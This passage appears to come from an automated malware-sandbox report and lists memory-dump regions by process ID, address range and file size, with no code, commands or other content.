                                                                                                                                                    496KB

                                                                                                                                                  • memory/1508-232-0x00000000056D0000-0x0000000005755000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    532KB

                                                                                                                                                  • memory/1704-191-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/1788-209-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/1812-180-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/1828-151-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/1848-186-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/2108-200-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/2116-184-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/2200-194-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/2688-226-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/2736-204-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/2760-177-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/2872-197-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/3020-154-0x00000202C7CF0000-0x00000202C7D12000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    136KB

                                                                                                                                                  • memory/3020-156-0x00007FFCEE170000-0x00007FFCEEC31000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    10.8MB

                                                                                                                                                  • memory/3020-157-0x00007FFCEE170000-0x00007FFCEEC31000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    10.8MB

                                                                                                                                                  • memory/3024-195-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/3060-159-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/3080-210-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/3148-144-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/3148-211-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/3244-192-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/3256-182-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/3324-153-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/3344-223-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/3348-173-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/3376-176-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/3380-150-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/3404-189-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/3444-183-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/3484-145-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/3508-174-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/3532-206-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/3580-214-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/3696-218-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/3840-181-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/3912-203-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/3928-175-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/3992-208-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4124-187-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4152-193-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4200-216-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4336-147-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4336-205-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4348-253-0x0000000002840000-0x0000000003840000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    16.0MB

                                                                                                                                                  • memory/4352-221-0x00007FFCED260000-0x00007FFCEDD21000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    10.8MB

                                                                                                                                                  • memory/4352-224-0x00007FFCED260000-0x00007FFCEDD21000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    10.8MB

                                                                                                                                                  • memory/4484-188-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4544-148-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4572-172-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4576-215-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4644-185-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4652-155-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4668-225-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4672-212-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4740-190-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4924-219-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4924-152-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4936-201-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4940-207-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4956-202-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/5012-171-0x0000000004C60000-0x0000000004C7E000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    120KB

                                                                                                                                                  • memory/5012-165-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/5012-166-0x00000000036F0000-0x0000000003726000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    216KB

                                                                                                                                                  • memory/5012-167-0x0000000003E30000-0x0000000004458000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    6.2MB

                                                                                                                                                  • memory/5012-168-0x0000000003D90000-0x0000000003DB2000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    136KB

                                                                                                                                                  • memory/5012-169-0x0000000004590000-0x00000000045F6000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    408KB

                                                                                                                                                  • memory/5012-170-0x0000000004600000-0x0000000004666000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    408KB